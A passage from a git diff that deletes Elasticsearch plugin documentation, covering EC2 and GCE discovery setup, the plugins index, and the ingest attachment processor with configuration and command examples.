`cloud.node.auto_attributes` to `true`. For example: - -[source,yaml] ----- -cloud.node.auto_attributes: true -cluster.routing.allocation.awareness.attributes: aws_availability_zone ----- - -The `aws_availability_zone` attribute can be automatically set like this when -using any discovery type. It is not necessary to set `discovery.seed_providers: -ec2`. However this feature does require that the `discovery-ec2` plugin is -installed. - -[[discovery-ec2-network-host]] -===== Binding to the correct address - -It is important to define `network.host` correctly when deploying a cluster on -EC2. By default each {es} node only binds to `localhost`, which will prevent it -from being discovered by nodes running on any other instances. - -You can use the {ref}/modules-network.html[core network host settings] to bind -each node to the desired address, or you can set `network.host` to one of the -following EC2-specific settings provided by the `discovery-ec2` plugin: - -[cols="<,<",options="header",] -|================================================================== -|EC2 Host Value |Description -|`_ec2:privateIpv4_` |The private IP address (ipv4) of the machine. -|`_ec2:privateDns_` |The private host of the machine. -|`_ec2:publicIpv4_` |The public IP address (ipv4) of the machine. -|`_ec2:publicDns_` |The public host of the machine. -|`_ec2:privateIp_` |Equivalent to `_ec2:privateIpv4_`. -|`_ec2:publicIp_` |Equivalent to `_ec2:publicIpv4_`. -|`_ec2_` |Equivalent to `_ec2:privateIpv4_`. -|================================================================== - -These values are acceptable when using any discovery type. They do not require -you to set `discovery.seed_providers: ec2`. However they do require that the -`discovery-ec2` plugin is installed. - -[[cloud-aws-best-practices]] -==== Best Practices in AWS - -This section contains some other information about designing and managing an -{es} cluster on your own AWS infrastructure. If you would prefer to avoid these -operational details then you may be interested in a hosted {es} installation -available on AWS-based infrastructure from https://www.elastic.co/cloud. - -===== Storage - -EC2 instances offer a number of different kinds of storage. Please be aware of -the following when selecting the storage for your cluster: - -* https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html[Instance -Store] is recommended for {es} clusters as it offers excellent performance and -is cheaper than EBS-based storage. {es} is designed to work well with this kind -of ephemeral storage because it replicates each shard across multiple nodes. If -a node fails and its Instance Store is lost then {es} will rebuild any lost -shards from other copies. - -* https://aws.amazon.com/ebs/[EBS-based storage] may be acceptable -for smaller clusters (1-2 nodes). Be sure to use provisioned IOPS to ensure -your cluster has satisfactory performance. - -* https://aws.amazon.com/efs/[EFS-based storage] is not -recommended or supported as it does not offer satisfactory performance. -Historically, shared network filesystems such as EFS have not always offered -precisely the behaviour that {es} requires of its filesystem, and this has been -known to lead to index corruption. Although EFS offers durability, shared -storage, and the ability to grow and shrink filesystems dynamically, you can -achieve the same benefits using {es} directly. - -===== Choice of AMI - -Prefer the https://aws.amazon.com/amazon-linux-2/[Amazon Linux 2 AMIs] as these -allow you to benefit from the lightweight nature, support, and EC2-specific -performance enhancements that these images offer. - -===== Networking - -* Smaller instance types have limited network performance, in terms of both -https://lab.getbase.com/how-we-discovered-limitations-on-the-aws-tcp-stack/[bandwidth -and number of connections]. If networking is a bottleneck, avoid -https://aws.amazon.com/ec2/instance-types/[instance types] with networking -labelled as `Moderate` or `Low`. - -* It is a good idea to distribute your nodes across multiple -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html[availability -zones] and use {ref}/modules-cluster.html#shard-allocation-awareness[shard -allocation awareness] to ensure that each shard has copies in more than one -availability zone. - -* Do not span a cluster across regions. {es} expects that node-to-node -connections within a cluster are reasonably reliable and offer high bandwidth -and low latency, and these properties do not hold for connections between -regions. Although an {es} cluster will behave correctly when node-to-node -connections are unreliable or slow, it is not optimised for this case and its -performance may suffer. If you wish to geographically distribute your data, you -should provision multiple clusters and use features such as -{ref}/modules-cross-cluster-search.html[cross-cluster search] and -{ref}/xpack-ccr.html[cross-cluster replication]. - -===== Other recommendations - -* If you have split your nodes into roles, consider -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Using_Tags.html[tagging the -EC2 instances] by role to make it easier to filter and view your EC2 instances -in the AWS console. - -* Consider -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/terminating-instances.html#Using_ChangingDisableAPITermination[enabling -termination protection] for all of your data and master-eligible nodes. This -will help to prevent accidental termination of these nodes which could -temporarily reduce the resilience of the cluster and which could cause a -potentially disruptive reallocation of shards. - -* If running your cluster using one or more -https://docs.aws.amazon.com/autoscaling/ec2/userguide/AutoScalingGroup.html[auto-scaling -groups], consider protecting your data and master-eligible nodes -https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html#instance-protection-instance[against -termination during scale-in]. This will help to prevent automatic termination -of these nodes which could temporarily reduce the resilience of the cluster and -which could cause a potentially disruptive reallocation of shards. If these -instances are protected against termination during scale-in then you can use -{ref}/shard-allocation-filtering.html[shard allocation filtering] to gracefully -migrate any data off these nodes before terminating them manually. diff --git a/docs/plugins/discovery-gce.asciidoc b/docs/plugins/discovery-gce.asciidoc deleted file mode 100644 index 199523db901..00000000000 --- a/docs/plugins/discovery-gce.asciidoc +++ /dev/null @@ -1,488 +0,0 @@ -[[discovery-gce]] -=== GCE Discovery Plugin - -The Google Compute Engine Discovery plugin uses the GCE API to identify the -addresses of seed hosts. - -:plugin_name: discovery-gce -include::install_remove.asciidoc[] - -[[discovery-gce-usage]] -==== GCE Virtual Machine Discovery - -Google Compute Engine VM discovery allows to use the google APIs to perform -automatic discovery of seed hosts. Here is a simple sample configuration: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: - zone: -discovery: - seed_providers: gce --------------------------------------------------- - -The following gce settings (prefixed with `cloud.gce`) are supported: - - `project_id`:: - - Your Google project id. - By default the project id will be derived from the instance metadata. - - Note: Deriving the project id from system properties or environment variables - (`GOOGLE_CLOUD_PROJECT` or `GCLOUD_PROJECT`) is not supported. - - `zone`:: - - helps to retrieve instances running in a given zone. - It should be one of the https://developers.google.com/compute/docs/zones#available[GCE supported zones]. - By default the zone will be derived from the instance metadata. - See also <>. - - `retry`:: - - If set to `true`, client will use - https://developers.google.com/api-client-library/java/google-http-java-client/backoff[ExponentialBackOff] - policy to retry the failed http request. Defaults to `true`. - - `max_wait`:: - - The maximum elapsed time after the client instantiating retry. If the time elapsed goes past the - `max_wait`, client stops to retry. A negative value means that it will wait indefinitely. Defaults to `0s` (retry - indefinitely). - - `refresh_interval`:: - - How long the list of hosts is cached to prevent further requests to the GCE API. `0s` disables caching. - A negative value will cause infinite caching. Defaults to `0s`. - - -[IMPORTANT] -.Binding the network host -============================================== - -It's important to define `network.host` as by default it's bound to `localhost`. - -You can use {ref}/modules-network.html[core network host settings] or -<>: - -============================================== - -[[discovery-gce-network-host]] -==== GCE Network Host - -When the `discovery-gce` plugin is installed, the following are also allowed -as valid network host settings: - -[cols="<,<",options="header",] -|================================================================== -|GCE Host Value |Description -|`_gce:privateIp:X_` |The private IP address of the machine for a given network interface. -|`_gce:hostname_` |The hostname of the machine. -|`_gce_` |Same as `_gce:privateIp:0_` (recommended). -|================================================================== - -Examples: - -[source,yaml] --------------------------------------------------- -# get the IP address from network interface 1 -network.host: _gce:privateIp:1_ -# Using GCE internal hostname -network.host: _gce:hostname_ -# shortcut for _gce:privateIp:0_ (recommended) -network.host: _gce_ --------------------------------------------------- - -[[discovery-gce-usage-short]] -===== How to start (short story) - -* Create Google Compute Engine instance (with compute rw permissions) -* Install Elasticsearch -* Install Google Compute Engine Cloud plugin -* Modify `elasticsearch.yml` file -* Start Elasticsearch - -[[discovery-gce-usage-long]] -==== Setting up GCE Discovery - - -[[discovery-gce-usage-long-prerequisites]] -===== Prerequisites - -Before starting, you need: - -* Your project ID, e.g. `es-cloud`. Get it from https://code.google.com/apis/console/[Google API Console]. -* To install https://developers.google.com/cloud/sdk/[Google Cloud SDK] - -If you did not set it yet, you can define your default project you will work on: - -[source,sh] --------------------------------------------------- -gcloud config set project es-cloud --------------------------------------------------- - -[[discovery-gce-usage-long-login]] -===== Login to Google Cloud - -If you haven't already, login to Google Cloud - -[source,sh] --------------------------------------------------- -gcloud auth login --------------------------------------------------- - -This will open your browser. You will be asked to sign-in to a Google account and -authorize access to the Google Cloud SDK. - -[[discovery-gce-usage-long-first-instance]] -===== Creating your first instance - - -[source,sh] --------------------------------------------------- -gcloud compute instances create myesnode1 \ - --zone \ - --scopes compute-rw --------------------------------------------------- - -When done, a report like this one should appears: - -[source,text] --------------------------------------------------- -Created [https://www.googleapis.com/compute/v1/projects/es-cloud-1070/zones/us-central1-f/instances/myesnode1]. -NAME ZONE MACHINE_TYPE PREEMPTIBLE INTERNAL_IP EXTERNAL_IP STATUS -myesnode1 us-central1-f n1-standard-1 10.240.133.54 104.197.94.25 RUNNING --------------------------------------------------- - -You can now connect to your instance: - -[source,sh] --------------------------------------------------- -# Connect using google cloud SDK -gcloud compute ssh myesnode1 --zone europe-west1-a - -# Or using SSH with external IP address -ssh -i ~/.ssh/google_compute_engine 192.158.29.199 --------------------------------------------------- - -[IMPORTANT] -.Service Account Permissions -============================================== - -It's important when creating an instance that the correct permissions are set. At a minimum, you must ensure you have: - -[source,text] --------------------------------------------------- -scopes=compute-rw --------------------------------------------------- - -Failing to set this will result in unauthorized messages when starting Elasticsearch. -See <>. -============================================== - -Once connected, {stack-gs}/get-started-elastic-stack.html#install-elasticsearch[install {es}]: - -[[discovery-gce-usage-long-install-plugin]] -===== Install Elasticsearch discovery gce plugin - -Install the plugin: - -[source,sh] --------------------------------------------------- -# Use Plugin Manager to install it -sudo bin/elasticsearch-plugin install discovery-gce --------------------------------------------------- - -Open the `elasticsearch.yml` file: - -[source,sh] --------------------------------------------------- -sudo vi /etc/elasticsearch/elasticsearch.yml --------------------------------------------------- - -And add the following lines: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: es-cloud - zone: europe-west1-a -discovery: - seed_providers: gce --------------------------------------------------- - - -Start Elasticsearch: - -[source,sh] --------------------------------------------------- -sudo /etc/init.d/elasticsearch start --------------------------------------------------- - -If anything goes wrong, you should check logs: - -[source,sh] --------------------------------------------------- -tail -f /var/log/elasticsearch/elasticsearch.log --------------------------------------------------- - -If needed, you can change log level to `trace` by opening `log4j2.properties`: - -[source,sh] --------------------------------------------------- -sudo vi /etc/elasticsearch/log4j2.properties --------------------------------------------------- - -and adding the following line: - -[source,yaml] --------------------------------------------------- -# discovery -logger.discovery_gce.name = discovery.gce -logger.discovery_gce.level = trace --------------------------------------------------- - - - -[[discovery-gce-usage-cloning]] -==== Cloning your existing machine - -In order to build a cluster on many nodes, you can clone your configured instance to new nodes. -You won't have to reinstall everything! - -First create an image of your running instance and upload it to Google Cloud Storage: - -[source,sh] --------------------------------------------------- -# Create an image of your current instance -sudo /usr/bin/gcimagebundle -d /dev/sda -o /tmp/ - -# An image has been created in `/tmp` directory: -ls /tmp -e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz - -# Upload your image to Google Cloud Storage: -# Create a bucket to hold your image, let's say `esimage`: -gsutil mb gs://esimage - -# Copy your image to this bucket: -gsutil cp /tmp/e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz gs://esimage - -# Then add your image to images collection: -gcloud compute images create elasticsearch-2-0-0 --source-uri gs://esimage/e4686d7f5bf904a924ae0cfeb58d0827c6d5b966.image.tar.gz - -# If the previous command did not work for you, logout from your instance -# and launch the same command from your local machine. --------------------------------------------------- - -[[discovery-gce-usage-start-new-instances]] -===== Start new instances - -As you have now an image, you can create as many instances as you need: - -[source,sh] --------------------------------------------------- -# Just change node name (here myesnode2) -gcloud compute instances create myesnode2 --image elasticsearch-2-0-0 --zone europe-west1-a - -# If you want to provide all details directly, you can use: -gcloud compute instances create myesnode2 --image=elasticsearch-2-0-0 \ - --zone europe-west1-a --machine-type f1-micro --scopes=compute-rw --------------------------------------------------- - -[[discovery-gce-usage-remove-instance]] -===== Remove an instance (aka shut it down) - -You can use https://cloud.google.com/console[Google Cloud Console] or CLI to manage your instances: - -[source,sh] --------------------------------------------------- -# Stopping and removing instances -gcloud compute instances delete myesnode1 myesnode2 \ - --zone=europe-west1-a - -# Consider removing disk as well if you don't need them anymore -gcloud compute disks delete boot-myesnode1 boot-myesnode2 \ - --zone=europe-west1-a --------------------------------------------------- - -[[discovery-gce-usage-zones]] -==== Using GCE zones - -`cloud.gce.zone` helps to retrieve instances running in a given zone. It should be one of the -https://developers.google.com/compute/docs/zones#available[GCE supported zones]. - -The GCE discovery can support multi zones although you need to be aware of network latency between zones. -To enable discovery across more than one zone, just enter add your zone list to `cloud.gce.zone` setting: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: - zone: ["", ""] -discovery: - seed_providers: gce --------------------------------------------------- - - - -[[discovery-gce-usage-tags]] -==== Filtering by tags - -The GCE discovery can also filter machines to include in the cluster based on tags using `discovery.gce.tags` settings. -For example, setting `discovery.gce.tags` to `dev` will only filter instances having a tag set to `dev`. Several tags -set will require all of those tags to be set for the instance to be included. - -One practical use for tag filtering is when a GCE cluster contains many nodes -that are not master-eligible {es} nodes. In this case, tagging the GCE -instances that _are_ running the master-eligible {es} nodes, and then filtering -by that tag, will help discovery to run more efficiently. - -Add your tag when building the new instance: - -[source,sh] --------------------------------------------------- -gcloud compute instances create myesnode1 --project=es-cloud \ - --scopes=compute-rw \ - --tags=elasticsearch,dev --------------------------------------------------- - -Then, define it in `elasticsearch.yml`: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: es-cloud - zone: europe-west1-a -discovery: - seed_providers: gce - gce: - tags: elasticsearch, dev --------------------------------------------------- - -[[discovery-gce-usage-port]] -==== Changing default transport port - -By default, Elasticsearch GCE plugin assumes that you run Elasticsearch on 9300 default port. -But you can specify the port value Elasticsearch is meant to use using google compute engine metadata `es_port`: - -[[discovery-gce-usage-port-create]] -===== When creating instance - -Add `--metadata es_port=9301` option: - -[source,sh] --------------------------------------------------- -# when creating first instance -gcloud compute instances create myesnode1 \ - --scopes=compute-rw,storage-full \ - --metadata es_port=9301 - -# when creating an instance from an image -gcloud compute instances create myesnode2 --image=elasticsearch-1-0-0-RC1 \ - --zone europe-west1-a --machine-type f1-micro --scopes=compute-rw \ - --metadata es_port=9301 --------------------------------------------------- - -[[discovery-gce-usage-port-run]] -===== On a running instance - -[source,sh] --------------------------------------------------- -gcloud compute instances add-metadata myesnode1 \ - --zone europe-west1-a \ - --metadata es_port=9301 --------------------------------------------------- - - -[[discovery-gce-usage-tips]] -==== GCE Tips - -[[discovery-gce-usage-tips-projectid]] -===== Store project id locally - -If you don't want to repeat the project id each time, you can save it in the local gcloud config - -[source,sh] --------------------------------------------------- -gcloud config set project es-cloud --------------------------------------------------- - -[[discovery-gce-usage-tips-permissions]] -===== Machine Permissions - -If you have created a machine without the correct permissions, you will see `403 unauthorized` error messages. To change machine permission on an existing instance, first stop the instance then Edit. Scroll down to `Access Scopes` to change permission. The other way to alter these permissions is to delete the instance (NOT THE DISK). Then create another with the correct permissions. - -Creating machines with gcloud:: -+ --- -Ensure the following flags are set: - -[source,text] --------------------------------------------------- ---scopes=compute-rw --------------------------------------------------- --- - -Creating with console (web):: -+ --- -When creating an instance using the web portal, click _Show advanced options_. - -At the bottom of the page, under `PROJECT ACCESS`, choose `>> Compute >> Read Write`. --- - -Creating with knife google:: -+ --- -Set the service account scopes when creating the machine: - -[source,sh] --------------------------------------------------- -knife google server create www1 \ - -m n1-standard-1 \ - -I debian-8 \ - -Z us-central1-a \ - -i ~/.ssh/id_rsa \ - -x jdoe \ - --gce-service-account-scopes https://www.googleapis.com/auth/compute.full_control --------------------------------------------------- - -Or, you may use the alias: - -[source,sh] --------------------------------------------------- - --gce-service-account-scopes compute-rw --------------------------------------------------- --- - -[[discovery-gce-usage-testing]] -==== Testing GCE - -Integrations tests in this plugin require working GCE configuration and -therefore disabled by default. To enable tests prepare a config file -elasticsearch.yml with the following content: - -[source,yaml] --------------------------------------------------- -cloud: - gce: - project_id: es-cloud - zone: europe-west1-a -discovery: - seed_providers: gce --------------------------------------------------- - -Replaces `project_id` and `zone` with your settings. - -To run test: - -[source,sh] --------------------------------------------------- -mvn -Dtests.gce=true -Dtests.config=/path/to/config/file/elasticsearch.yml clean test --------------------------------------------------- diff --git a/docs/plugins/discovery.asciidoc b/docs/plugins/discovery.asciidoc deleted file mode 100644 index 100373c50b8..00000000000 --- a/docs/plugins/discovery.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[discovery]] -== Discovery Plugins - -Discovery plugins extend Elasticsearch by adding new seed hosts providers that -can be used to extend the {ref}/modules-discovery.html[cluster formation -module]. - -[discrete] -==== Core discovery plugins - -The core discovery plugins are: - -<>:: - -The EC2 discovery plugin uses the https://github.com/aws/aws-sdk-java[AWS API] -to identify the addresses of seed hosts. - -<>:: - -The Azure Classic discovery plugin uses the Azure Classic API to identify the -addresses of seed hosts. - -<>:: - -The Google Compute Engine discovery plugin uses the GCE API to identify the -addresses of seed hosts. - -[discrete] -==== Community contributed discovery plugins - -The following discovery plugins have been contributed by our community: - -* https://github.com/fabric8io/elasticsearch-cloud-kubernetes[Kubernetes Discovery Plugin] (by Jimmi Dyson, https://fabric8.io[fabric8]) - -include::discovery-ec2.asciidoc[] - -include::discovery-azure-classic.asciidoc[] - -include::discovery-gce.asciidoc[] diff --git a/docs/plugins/index.asciidoc b/docs/plugins/index.asciidoc deleted file mode 100644 index 4d51ff147d7..00000000000 --- a/docs/plugins/index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -= Elasticsearch Plugins and Integrations - -include::../Versions.asciidoc[] - -[[intro]] -== Introduction to plugins - -Plugins are a way to enhance the core Elasticsearch functionality in a custom -manner. They range from adding custom mapping types, custom analyzers, native -scripts, custom discovery and more. - -Plugins contain JAR files, but may also contain scripts and config files, and -must be installed on every node in the cluster. After installation, each -node must be restarted before the plugin becomes visible. - -NOTE: A full cluster restart is required for installing plugins that have -custom cluster state metadata, such as X-Pack. It is still possible to upgrade -such plugins with a rolling restart. - -This documentation distinguishes two categories of plugins: - -Core Plugins:: This category identifies plugins that are part of Elasticsearch -project. Delivered at the same time as Elasticsearch, their version number always -matches the version number of Elasticsearch itself. These plugins are maintained -by the Elastic team with the appreciated help of amazing community members (for -open source plugins). Issues and bug reports can be reported on the -https://github.com/elastic/elasticsearch[Github project page]. - -Community contributed:: This category identifies plugins that are external to -the Elasticsearch project. They are provided by individual developers or private -companies and have their own licenses as well as their own versioning system. -Issues and bug reports can usually be reported on the community plugin's web site. - -For advice on writing your own plugin, see <>. - -IMPORTANT: Site plugins -- plugins containing HTML, CSS and JavaScript -- are -no longer supported. - -include::plugin-script.asciidoc[] - -include::api.asciidoc[] - -include::alerting.asciidoc[] - -include::analysis.asciidoc[] - -include::discovery.asciidoc[] - -include::ingest.asciidoc[] - -include::management.asciidoc[] - -include::mapper.asciidoc[] - -include::security.asciidoc[] - -include::repository.asciidoc[] - -include::store.asciidoc[] - -include::integrations.asciidoc[] - -include::authors.asciidoc[] - -include::redirects.asciidoc[] diff --git a/docs/plugins/ingest-attachment.asciidoc b/docs/plugins/ingest-attachment.asciidoc deleted file mode 100644 index 901bc19974f..00000000000 --- a/docs/plugins/ingest-attachment.asciidoc +++ /dev/null @@ -1,390 +0,0 @@ -[[ingest-attachment]] -=== Ingest Attachment Processor Plugin - -The ingest attachment plugin lets Elasticsearch extract file attachments in common formats (such as PPT, XLS, and PDF) by -using the Apache text extraction library https://tika.apache.org/[Tika]. - -You can use the ingest attachment plugin as a replacement for the mapper attachment plugin. - -The source field must be a base64 encoded binary. If you do not want to incur -the overhead of converting back and forth between base64, you can use the CBOR -format instead of JSON and specify the field as a bytes array instead of a string -representation. The processor will skip the base64 decoding then. - -:plugin_name: ingest-attachment -include::install_remove.asciidoc[] - -[[using-ingest-attachment]] -==== Using the Attachment Processor in a Pipeline - -[[ingest-attachment-options]] -.Attachment options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the base64 encoded field from -| `target_field` | no | attachment | The field that will hold the attachment information -| `indexed_chars` | no | 100000 | The number of chars being used for extraction to prevent huge fields. Use `-1` for no limit. -| `indexed_chars_field` | no | `null` | Field name from which you can overwrite the number of chars being used for extraction. See `indexed_chars`. -| `properties` | no | all properties | Array of properties to select to be stored. Can be `content`, `title`, `name`, `author`, `keywords`, `date`, `content_type`, `content_length`, `language` -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -|====== - -[discrete] -[[ingest-attachment-json-ex]] -==== Example - -If attaching files to JSON documents, you must first encode the file as a base64 -string. On Unix-like systems, you can do this using a `base64` command: - -[source,shell] ----- -base64 -in myfile.rtf ----- - -The command returns the base64-encoded string for the file. The following base64 -string is for an `.rtf` file containing the text `Lorem ipsum dolor sit amet`: -`e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=`. - -Use an attachment processor to decode the string and extract the file's -properties: - -[source,console] ----- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=" -} -GET my-index-000001/_doc/my_id ----- - -The document's `attachment` object contains extracted properties for the file: - -[source,console-result] ----- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "attachment": { - "content_type": "application/rtf", - "language": "ro", - "content": "Lorem ipsum dolor sit amet", - "content_length": 28 - } - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -To extract only certain `attachment` fields, specify the `properties` array: - -[source,console] ----- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "properties": [ "content", "title" ] - } - } - ] -} ----- - -NOTE: Extracting contents from binary data is a resource intensive operation and - consumes a lot of resources. It is highly recommended to run pipelines - using this processor in a dedicated ingest node. - -[[ingest-attachment-cbor]] -==== Use the attachment processor with CBOR - -To avoid encoding and decoding JSON to base64, you can instead pass CBOR data to -the attachment processor. For example, the following request creates the -`cbor-attachment` pipeline, which uses the attachment processor. - -[source,console] ----- -PUT _ingest/pipeline/cbor-attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data" - } - } - ] -} ----- - -The following Python script passes CBOR data to an HTTP indexing request that -includes the `cbor-attachment` pipeline. The HTTP request headers use a -a `content-type` of `application/cbor`. - -NOTE: Not all {es} clients support custom HTTP request headers. - -[source,python] ----- -import cbor2 -import requests - -file = 'my-file' -headers = {'content-type': 'application/cbor'} - -with open(file, 'rb') as f: - doc = { - 'data': f.read() - } - requests.put( - 'http://localhost:9200/my-index-000001/_doc/my_id?pipeline=cbor-attachment', - data=cbor2.dumps(doc), - headers=headers - ) ----- - -[[ingest-attachment-extracted-chars]] -==== Limit the number of extracted chars - -To prevent extracting too many chars and overload the node memory, the number of chars being used for extraction -is limited by default to `100000`. You can change this value by setting `indexed_chars`. Use `-1` for no limit but -ensure when setting this that your node will have enough HEAP to extract the content of very big documents. - -You can also define this limit per document by extracting from a given field the limit to set. If the document -has that field, it will overwrite the `indexed_chars` setting. To set this field, define the `indexed_chars_field` -setting. - -For example: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "indexed_chars" : 11, - "indexed_chars_field" : "max_size" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=" -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 35, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "attachment": { - "content_type": "application/rtf", - "language": "sl", - "content": "Lorem ipsum", - "content_length": 11 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information", - "processors" : [ - { - "attachment" : { - "field" : "data", - "indexed_chars" : 11, - "indexed_chars_field" : "max_size" - } - } - ] -} -PUT my-index-000001/_doc/my_id_2?pipeline=attachment -{ - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "max_size": 5 -} -GET my-index-000001/_doc/my_id_2 --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id_2", - "_version": 1, - "_seq_no": 40, - "_primary_term": 1, - "_source": { - "data": "e1xydGYxXGFuc2kNCkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0DQpccGFyIH0=", - "max_size": 5, - "attachment": { - "content_type": "application/rtf", - "language": "ro", - "content": "Lorem", - "content_length": 5 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -[[ingest-attachment-with-arrays]] -==== Using the Attachment Processor with arrays - -To use the attachment processor within an array of attachments the -{ref}/foreach-processor.html[foreach processor] is required. This -enables the attachment processor to be run on the individual elements -of the array. - -For example, given the following source: - -[source,js] --------------------------------------------------- -{ - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=" - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -In this case, we want to process the data field in each element -of the attachments field and insert -the properties into the document so the following `foreach` -processor is used: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/attachment -{ - "description" : "Extract attachment information from arrays", - "processors" : [ - { - "foreach": { - "field": "attachments", - "processor": { - "attachment": { - "target_field": "_ingest._value.attachment", - "field": "_ingest._value.data" - } - } - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=attachment -{ - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=" - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK" - } - ] -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Returns this: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "my_id", - "_version" : 1, - "_seq_no" : 50, - "_primary_term" : 1, - "found" : true, - "_source" : { - "attachments" : [ - { - "filename" : "ipsum.txt", - "data" : "dGhpcyBpcwpqdXN0IHNvbWUgdGV4dAo=", - "attachment" : { - "content_type" : "text/plain; charset=ISO-8859-1", - "language" : "en", - "content" : "this is\njust some text", - "content_length" : 24 - } - }, - { - "filename" : "test.txt", - "data" : "VGhpcyBpcyBhIHRlc3QK", - "attachment" : { - "content_type" : "text/plain; charset=ISO-8859-1", - "language" : "en", - "content" : "This is a test", - "content_length" : 16 - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Note that the `target_field` needs to be set, otherwise the -default value is used which is a top level field `attachment`. The -properties on this top level field will contain the value of the -first attachment only. However, by specifying the -`target_field` on to a value on `_ingest._value` it will correctly -associate the properties with the correct attachment. diff --git a/docs/plugins/ingest-geoip.asciidoc b/docs/plugins/ingest-geoip.asciidoc deleted file mode 100644 index 71be02c52dd..00000000000 --- a/docs/plugins/ingest-geoip.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[ingest-geoip]] -=== Ingest `geoip` Processor Plugin - -The `geoip` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See the -{ref}/geoip-processor.html[GeoIP processor] for more details. - -[[using-ingest-geoip]] -==== Using the `geoip` Processor in a Pipeline - -See {ref}/geoip-processor.html#using-ingest-geoip[using `ingest-geoip`]. diff --git a/docs/plugins/ingest-user-agent.asciidoc b/docs/plugins/ingest-user-agent.asciidoc deleted file mode 100644 index 51bfe7376c4..00000000000 --- a/docs/plugins/ingest-user-agent.asciidoc +++ /dev/null @@ -1,7 +0,0 @@ -[[ingest-user-agent]] -=== Ingest `user_agent` Processor Plugin - -The `user_agent` processor is no longer distributed as a plugin, but is now a module -distributed by default with Elasticsearch. See the -{ref}/user-agent-processor.html[User Agent processor] for more details. - diff --git a/docs/plugins/ingest.asciidoc b/docs/plugins/ingest.asciidoc deleted file mode 100644 index 257b74d9290..00000000000 --- a/docs/plugins/ingest.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[ingest]] -== Ingest Plugins - -The ingest plugins extend Elasticsearch by providing additional ingest node capabilities. - -[discrete] -=== Core Ingest Plugins - -The core ingest plugins are: - -<>:: - -The ingest attachment plugin lets Elasticsearch extract file attachments in common formats (such as PPT, XLS, and PDF) by -using the Apache text extraction library https://tika.apache.org/[Tika]. - -<>:: - -The `geoip` processor adds information about the geographical location of IP -addresses, based on data from the Maxmind databases. This processor adds this -information by default under the `geoip` field. The `geoip` processor is no -longer distributed 